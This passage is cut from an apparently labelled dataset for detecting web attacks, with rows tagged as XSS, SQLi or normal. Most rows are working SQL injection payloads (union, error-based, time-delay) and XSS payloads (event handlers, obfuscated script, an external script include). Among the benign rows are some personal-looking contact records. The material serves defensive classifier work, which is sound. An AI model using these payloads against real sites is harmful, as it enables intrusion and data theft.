'ouup' = 'ouup",2,SQLi,10147 "1"" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13735 "<noembed draggable=""true"" ondragstart=""alert(1)"">test</noembed>",1,XSS,3085 "<a href=""javascript:javascript:alert(1)""><event-source src=""data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"">",1,XSS,634 preceding,3,normal,23239 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13",2,SQLi,18901 "&lt;IMG \""\""\""&gt;&lt;SCRIPT&gt;alert(\""XSS\"")&lt;/SCRIPT&gt;\""&gt;",1,XSS,2667 "To do this, open Picasa and go to 'Tools,' then 'Folder Manager.' Here, select the 'Instagram Photos' folder and set Picasa to 'Scan Always.' Once you've done this, find the folder in your Picasa sidebar and select 'Enable Sync' from the drop-down menu.",3,normal,25277 "What, probably, will he spy?—what will he select to look at?",3,normal,25165 -7452' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'nmdq' like 'nmdq,2,SQLi,10550 "-9140"" ) ) union all select 1623,1623,1623,1623,1623,1623,1623,1623,1623#",2,SQLi,15860 "1"" ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""eoab"" like ""eoab",2,SQLi,10084 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--",2,SQLi,14812 "1' ) as sjzi where 8242 = 8242 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12099 "Today, the company is actually launching that feature in select geographies.",3,normal,25244 1 ) ) ) union all select null#,2,SQLi,20621 "-6581'|| ( select 'hpjd' where 7608 = 7608 union all select 7608,7608,7608,7608,7608,7608,7608,7608#",2,SQLi,14133 <marquee onstart=alert(1)>,1,XSS,9689 "1 ) union all select null,null--",2,SQLi,20282 "1"" ) rlike sleep ( 5 ) and ( ""rfsd"" = ""rfsd",2,SQLi,19225 Select your struggle.,3,normal,24922 <article id=x tabindex=1 onfocus=alert(1)></article>,1,XSS,5251 <button onMouseUp=javascript:alert(1)>,1,XSS,8536 <nextid onpointerout=alert(1)>XSS</nextid>,1,XSS,7429 -2929' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 'nzmk' = 'nzmk,2,SQLi,12369 "The Galaxy S10 phones also support select decentralized apps (""Dapps"").",3,normal,25443 <samp onpointerenter=alert(1)>XSS</samp>,1,XSS,7982 But it wasn't open to all – only select partners.,3,normal,26312 "<style>@keyframes x{}</style><li style=""animation-name:x"" onanimationstart=""alert(1)""></li>",1,XSS,1737 I'm considering where to have a romantic dinner.,3,normal,23823 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""nxvp"" = ""nxvp",2,SQLi,14508 "<strike onkeyup=""alert(1)"" contenteditable>test</strike>",1,XSS,4257 Select your pledge.,3,normal,24956 <sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus>,1,XSS,2477 "1 where 7072 = 7072 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,10780 "{""id"":null,""firstName"":""Mike"",""lastName"":""Bane"",""address"":""3 Railway Ave #75"",""city"":""639"",""telephone"":""5085419517""}",3,normal,27598 <canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas>,1,XSS,3715 "<element onmouseout=""alert(1)"">test</element>",1,XSS,6707 "1"" and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,18212 "OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",2,SQLi,17115 can I select,3,normal,26298 "<dir onkeydown=""alert(1)"" contenteditable>test</dir>",1,XSS,5191 Select the style that works for you and that suits you.,3,normal,25583 "-7395%"" order by 1--",2,SQLi,21887 "select * from users where id = 1 union select @ $$,version ( ) -- 1",2,SQLi,16480 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4#",2,SQLi,14234 "<form onmousedown=""alert(1)"">test</form>",1,XSS,7846 "1' ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 'dssx' like 'dssx",2,SQLi,12664 "1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'bzak' like 'bzak",2,SQLi,14076 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 'quqx' = 'quqx",2,SQLi,13055 "{""id"":null,""name"":""MetalGarurumon""}",3,normal,27160 "1"" ) where 1807 = 1807",2,SQLi,21516 "<img\x10src=x onerror=""javascript:alert(1)"">",1,XSS,6767 "1%' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( '%' = '",2,SQLi,10817 "<style>:target {color:red;}</style><param id=x style=""transition:color 1s"" ontransitionend=alert(1)></param>",1,XSS,1127 "1"" ) ) as aozi where 3354 = 3354 waitfor delay '0:0:5'--",2,SQLi,17649 "{""id"":null,""name"":""Drever""}",3,normal,27267 1'|| ( select 'aevx' from dual where 9999 = 9999,2,SQLi,18757 "1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( 'lkun' like 'lkun",2,SQLi,11567 Filter calls.,3,normal,23028 day,3,normal,23206 "<div onbeforepaste=""alert(1)"" contenteditable>test</div>",1,XSS,4360 "1"" ) where 7957 = 7957 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14138 "-8893%' ) ) or elt ( 1032 = 1032,3623 ) and ( ( '%' = '",2,SQLi,17751 "{""id"":null,""firstName"":""Susan"",""lastName"":""Tham"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27603 1' ) where 6045 = 6045,2,SQLi,21431 <table onpointerleave=alert(1)>XSS</table>,1,XSS,7424 "<acronym onmouseout=""alert(1)"">test</acronym>",1,XSS,6655 "-4705' where 2029 = 2029 union all select 2029,2029,2029#",2,SQLi,17508 "<img \x00src=x onerror=""alert(1)"">",1,XSS,9163 Can you help me decide where to eat?,3,normal,23753 "<title ondblclick=""alert(1)"">test</title>",1,XSS,7625 "<style>:target {color: red;}</style><menu id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></menu>",1,XSS,989 "select * from users where id = '1' + $ . union select 1,@@VERSION -- 1'",2,SQLi,16038 "ABC<div style=""x:\xE3\x80\x80expression(javascript:alert(1)"">DEF",1,XSS,2854 "-4838' ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11719 <col onpointerout=alert(1)>XSS</col>,1,XSS,8856 "select * from users where id = 1.<@$ union select 1,version ( ) -- 1",2,SQLi,16360 "; if not ( substring ( ( select @@version ) ,25,1 ) <> 8 ) waitfor delay '0:0:2' --",2,SQLi,15020 "-5518 ) as yvqm where 7360 = 7360 union all select 7360,7360#",2,SQLi,17038 -4331 ) as inpx where 9804 = 9804 union all select 9804#,2,SQLi,17657 -2100' where 9260 = 9260 or 3038 = 3038,2,SQLi,19587 "-6368 ) ) union all select 4646,4646,4646,4646,4646,4646,4646--",2,SQLi,16890 <svg/onload=alert`INJECTX`>,1,XSS,9657 "<datalist onkeypress=""alert(1)"" contenteditable>test</datalist>",1,XSS,3042 "1"" ) where 9770 = 9770 union all select null,null,null,null,null,null--",2,SQLi,16059 "<hr draggable=""true"" ondragstart=""alert(1)"">test</hr>",1,XSS,5012 Select crops will be grown indoors using hydroponics (without soil).,3,normal,25637 Where's your SQL repository?,3,normal,23426 "<strong draggable=""true"" ondragleave=""alert(1)"">test</strong>",1,XSS,3275 <image3 onpointermove=alert(1)>XSS</image3>,1,XSS,7230 "<style draggable=""true"" ondragenter=""alert(1)"">test</style>",1,XSS,3685 Create quiz.,3,normal,23100 <map id=x tabindex=1 onfocus=alert(1)></map>,1,XSS,6810 "1"" ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ""umst"" = ""umst",2,SQLi,12361 "admin"" or ""1""=""1",2,SQLi,22114 "<div draggable=""true"" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup>",1,XSS,1318 "<address onbeforecut=""alert(1)"" contenteditable>test</address>",1,XSS,3227 "1%"" ) ) and make_set ( 9897 = 5557,5557 ) and ( ( ""%"" = """,2,SQLi,17480 1' ) ) ) and 6991 = 5579,2,SQLi,21230 Up to 30% off select smart and electronic door locks,3,normal,25219 onFocus(),1,XSS,9855 <code id=x tabindex=1 onactivate=alert(1)></code>,1,XSS,5754 1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'uwbt' like 'uwbt,2,SQLi,10641 1'|| ( select 'ywfo' from dual where 4168 = 4168 rlike sleep ( 5 ) #,2,SQLi,16417 "<bdi draggable=""true"" ondragleave=""alert(1)"">test</bdi>",1,XSS,4618 "1"" ) or sleep ( 5 ) and ( ""xgtk"" = ""xgtk",2,SQLi,19505 "{""id"":null,""firstName"":""Chng"",""lastName"":""Meng Khuan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26861 Identify columns where applicable.,3,normal,23295 "<style>:target {color:red;}</style><col id=x style=""transition:color 1s"" ontransitionend=alert(1)></col>",1,XSS,1302 Where did you discover that hidden gem?,3,normal,23711 "1'|| ( select 'svbf' where 7017 = 7017 or elt ( 6272 = 6272,sleep ( 5 ) ) ) ||'",2,SQLi,15246 Plant a thriving garden.,3,normal,22710 "{""id"":null,""name"":""Lobomon""}",3,normal,26928 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--",2,SQLi,13697 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,9904 <script>var{haha:onerror=alert}=0;throw 1</script>,1,XSS,5497 1 ) where 2307 = 2307,2,SQLi,21706 <x ondrag=alert(1)>drag this!,1,XSS,9603 "<script>with(document.getElementById(""d""))innerHTML=innerHTML</script>//[""'`-->]]>]</div>",1,XSS,1800 "1%' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12173 <BODY ONLOAD=alert(’XSS’)>,1,XSS,9670 1 ) ) and 3249 = 2985,2,SQLi,21618 Select travel.,3,normal,24653 1' ) where 1183 = 1183,2,SQLi,21462 <progress onpointerout=alert(1)>XSS</progress>,1,XSS,6443 "<var onmouseout=""alert(1)"">test</var>",1,XSS,8639 Select bowl.,3,normal,24531 "1 ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15624 1' ) as lgex where 4068 = 4068 and 1378 = 9247--,2,SQLi,18767 "{""id"":null,""firstName"":""Kp"",""lastName"":""Lee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26791 <dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog>,1,XSS,3656 <form onsubmit=alert(1)><input type=submit>,1,XSS,7055 "-9698' ) ) as qnjv where 3360 = 3360 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,15969 "1 ) as iupg where 2861 = 2861 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11395 "1%"" ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15734 "<style>:target {color:red;}</style><bdi id=x style=""transition:color 1s"" ontransitionend=alert(1)></bdi>",1,XSS,1288 ))%20waitfor%20delay%20'0:0:20'%20--,2,SQLi,19938 """ waitfor delay '0:0:20' /*",2,SQLi,20858 <source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus>,1,XSS,2139 floor,3,normal,23213 "1%"" ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( ""%"" = """,2,SQLi,10852 "1"" ) as sstd where 9629 = 9629 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12232 "1"" ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""zzcd"" = ""zzcd",2,SQLi,12313 &#060,1,XSS,9876 1 where 8095 = 8095,2,SQLi,21954 1 ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( 7015 = 7015,2,SQLi,16513 He selected a classic novel to read on vacation.,3,normal,23737 ( select ( case when ( 3348 = 1710 ) then 3348 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual ),2,SQLi,13491 "<source onmousedown=""alert(1)"">test</source>",1,XSS,6897 "=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23",2,SQLi,9888 "<IMG SRC=x onseeked=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3612 <iframe onpointerdown=alert(1)>XSS</iframe>,1,XSS,7154 1'+ ( select 'toec' where 5810 = 5810 and sleep ( 5 ) ) +',2,SQLi,17371 <multicol onpointerenter=alert(1)>XSS</multicol>,1,XSS,6014 "1"" ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13669 1 ) as jmib where 8130 = 8130 rlike ( select ( case when ( 7885 = 3932 ) then 1 else 0x28 end ) ) --,2,SQLi,14137 <spacer id=x tabindex=1 onactivate=alert(1)></spacer>,1,XSS,4884 "1' ) ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16548 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( 'ztmd' = 'ztmd",2,SQLi,13100 "1 ) as qodq where 4945 = 4945 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12635 "1' ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12070 "<cite draggable=""true"" ondragleave=""alert(1)"">test</cite>",1,XSS,4148 "<kbd onmouseup=""alert(1)"">test</kbd>",1,XSS,8909 Fetch data where valid.,3,normal,23362 "<img src=x onerror=\x11""javascript:alert(1)"">",1,XSS,6545 1 ) where 5025 = 5025,2,SQLi,21658 "<img SRC="" &#14; javascript:document.vulnerable=true;"">",1,XSS,4433 "You don't need to select quests to earn loot, though.",3,normal,25077 "<style>@keyframes slidein {}</style><link style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></link>",1,XSS,408 Select go.,3,normal,24638 "Go to the Start menu, open Settings and select System.",3,normal,26141 "1"" ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13202 "-7171%' ) ) union all select 5580,5580,5580,5580,5580,5580,5580,5580--",2,SQLi,16197 1%' ) ) order by 1--,2,SQLi,21860 <html onpointerdown=alert(1)>XSS</html>,1,XSS,8237 "1' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'nlky' like 'nlky",2,SQLi,11046 "1' ) as sjmt where 6541 = 6541 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14075 "1%"" ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""%"" = """,2,SQLi,11587 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 4 ) ) AND 'i' = 'i",2,SQLi,11580 1' ) union all select null--,2,SQLi,20811 "-1065 ) ) union all select 7437,7437,7437,7437,7437,7437,7437,7437--",2,SQLi,16377 1 ) where 6472 = 6472,2,SQLi,21667 "<script>$=~[];$={___:++$,$$$$:(![]+"""")[$],__$:++$,$_$_:(![]+"""")[$],_$_:++$,$_$$:({}+"""")[$],$$_$:($[$]+"""")[$],_$$:++$,$$$_:(!""""+"""")[$],$__:++$,$_$:++$,$$__:({}+"""")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"""")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"""")[$.__$])+((!$)+"""")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""""+"""")[$.__$])+($._=(!""""+"""")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""""+"""")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+""\""""+$.$_$_+(![]+"""")[$._$_]+$.$$$_+""\\""+$.__$+$.$$_+$._$_+$.__+""(""+$.___+"")""+""\"""")())();</script>",1,XSS,13 "<track onkeyup=""alert(1)"" contenteditable>test</track>",1,XSS,4762 "<div draggable=""true"" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr>",1,XSS,1179 "1%"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,10717 "ABC<div style=""x:\xE2\x80\x81expression(javascript:alert(1)"">DEF",1,XSS,2865 "<keygen oncontextmenu=""alert(1)"">test</keygen>",1,XSS,6473 Delete the unnecessary apps.,3,normal,22654 "<tt onmouseup=""alert(1)"">test</tt>",1,XSS,9221 "1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'ulep' = 'ulep",2,SQLi,12064 "<IMG SRC=x onratechange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2991 Where's the arena?,3,normal,23543 "1 where 7522 = 7522 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11231 "<b oncut=""alert(1)"" contenteditable>test</b>",1,XSS,7013 "1"" ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ""jzbb"" = ""jzbb",2,SQLi,11554 "-8612'+ ( select 'iqla' where 5035 = 5035 union all select 5035,5035,5035,5035,5035,5035,5035#",2,SQLi,14461 and 1='1,2,SQLi,22479 "<rb onmouseover=""alert(1)"">test</rb>",1,XSS,8930 "1' ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 'ican' like 'ican",2,SQLi,12616 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#",2,SQLi,17848 "{""id"":null,""name"":""highway go""}",3,normal,27280 "<script+src="">""+src=""http://yoursite.com/xss.js?69,69""></script>",1,XSS,2877 "1 ) ) as qzmg where 4344 = 4344 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12202 <li onpointermove=alert(1)>XSS</li>,1,XSS,9111 <frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus>,1,XSS,2192 Save up to 20% off select Greenworks 80V Outdoor Power Equipment,3,normal,25731 Where's the shaman?,3,normal,23658 "<blink draggable=""true"" ondragleave=""alert(1)"">test</blink>",1,XSS,3728 1' ) rlike sleep ( 5 ) and ( 'tslp' = 'tslp,2,SQLi,19180 "-4350"" ) ) as mmwq where 9801 = 9801 or ( 8520 = 2834 ) *2834--",2,SQLi,16862 "<em onmouseout=""alert(1)"">test</em>",1,XSS,9016 "<html onmouseout=""alert(1)"">test</html>",1,XSS,8192 "<style>:target {color:red;}</style><rp id=x style=""transition:color 1s"" ontransitionend=alert(1)></rp>",1,XSS,1369 "<output draggable=""true"" ondragend=""alert(1)"">test</output>",1,XSS,3714 "<data oncopy=""alert(1)"" contenteditable>test</data>",1,XSS,5452 "-4919 ) union all select 2608,2608,2608,2608,2608,2608#",2,SQLi,17796 "1%' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( '%' = '",2,SQLi,15662 "<style>:target {color: red;}</style><time id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></time>",1,XSS,1002 "<image ondblclick=""alert(1)"">test</image>",1,XSS,7764 <xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus>,1,XSS,3555 "<main onbeforecopy=""alert(1)"" contenteditable>test</main>",1,XSS,4116 "<style>@keyframes x{}</style><big style=""animation-name:x"" onanimationstart=""alert(1)""></big>",1,XSS,1669 <nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus>,1,XSS,3175 select ( case when ( 3336 = 9781 ) then 3336 else 1/ ( select 0 ) end ) --,2,SQLi,15764 "{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in jmeter test <DO NOT DELETE>"",""specialties"":[{""id"":1,""name"":""Infantry1001""},{""id"":2,""name"":""Air Defense Artillery""},{""id"":24,""name"":""Engineer""}]}",3,normal,26813 "<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:document.vulnerable=true""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></span>",1,XSS,490 1 ) where 9552 = 9552 and 1961 = 6333--,2,SQLi,19638 "UNION ALL SELECT 1,2,3,4,5,6,7,8",2,SQLi,20236 "Additionally, you can save up to 65% on select sale styles.",3,normal,26408 "1"" or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ""uosc"" = ""uosc",2,SQLi,12999 -9217 or 9323 = 9323#,2,SQLi,21623 "<applet onclick=""alert(1)"">test</applet>",1,XSS,7851 <STYLE>@import'http://xss.rocks/xss.css';</STYLE>,1,XSS,5706 "{""id"":null,""firstName"":""Mohd"",""lastName"":""Amrul"",""address"":""993 Washington Ave"",""city"":""947"",""telephone"":""350952190""}",3,normal,27140 "<sub onmouseenter=""alert(1)"">test</sub>",1,XSS,8136 "-4550"" ) as hlwe where 6026 = 6026 or ( 9364 = 9593 ) *9593--",2,SQLi,17111 "<blockquote onmouseover=""alert(1)"">test</blockquote>",1,XSS,5107 Nor is it difficult to imagine the probable course of reasoning which led Bessel to select the model of his new heliometer.,3,normal,25870 "<iframe onbeforecopy=""alert(1)"" contenteditable>test</iframe>",1,XSS,3293 <nobr onpointerdown=alert(1)>XSS</nobr>,1,XSS,8128 "1' ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 'jwbt' = 'jwbt",2,SQLi,11889 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--",2,SQLi,13404 <script>location=name</script>,1,XSS,9522 "{""id"":null,""name"":""sea""}",3,normal,27128 "1', ( select * from generate_series ( 5609,5609,case when ( 5609 = 5609 ) then 1 else 0 end ) limit 1 )",2,SQLi,13989 "1%"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""%"" = """,2,SQLi,14311 select ( case when ( 5464 = 9350 ) then 5464 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13622 "If you decide you want matching napkins, select them in the same color and fabric as the tablecloth for a more traditional approach.",3,normal,26053 1 ) ) and 9198 = 9198--,2,SQLi,21324 <address id=x tabindex=1 onactivate=alert(1)></address>,1,XSS,4442 "-9840 ) ) as thod where 4790 = 4790 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10079 "-8215%"" ) union all select 3877,3877,3877,3877,3877,3877--",2,SQLi,17394 "{""id"":null,""firstName"":""Darry"",""lastName"":""Ng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26955 "{""id"":null,""name"":""Probopass""}",3,normal,27369 "{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in jmeter test <DO NOT DELETE>"",""specialties"":[{""id"":1,""name"":""Infantry1001""},{""id"":2,""name"":""Air Defense Artillery""}]}",3,normal,26800 Select the perfect song for the moment.,3,normal,24131 1 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) # mekk,2,SQLi,15528 Order a margherita pizza.,3,normal,22683 or ''*',2,SQLi,22511 "1"" ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ""cjkk"" like ""cjkk",2,SQLi,15601 "<dt onbeforecut=""alert(1)"" contenteditable>test</dt>",1,XSS,5240 "create user name identified by pass123 temporary tablespace temp default tablespace users,",2,SQLi,14670 "1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)",2,SQLi,15576 select * from users where id = '1' or $<\ or 1 = 1 -- 1',2,SQLi,17606 "1'+ ( select 'asmj' where 7808 = 7808 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) ) +'",2,SQLi,12397 "He became a fellow of Magdalen College, Oxford, in 1795, took orders in 1802, and was select university preacher in 1804.",3,normal,26128 "1%' ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13693 "<aside onmouseover=""alert(1)"">test</aside>",1,XSS,7522 unbounded,3,normal,23238 1' ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'ulkq' = 'ulkq,2,SQLi,10015 "<p onmousemove=""alert(1)"">test</p>",1,XSS,9209 Select like.,3,normal,24746 "<i onclick=""alert(1)"">test</i>",1,XSS,9559 1' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'foop' like 'foop,2,SQLi,10249 Where's the jogging track?,3,normal,23601 "<col onbeforecopy=""alert(1)"" contenteditable>test</col>",1,XSS,4472 1'|| ( select 'ovlx' where 8767 = 8767 or sleep ( 5 ) ) ||',2,SQLi,17299 "1%' ) ) and ( select 9067 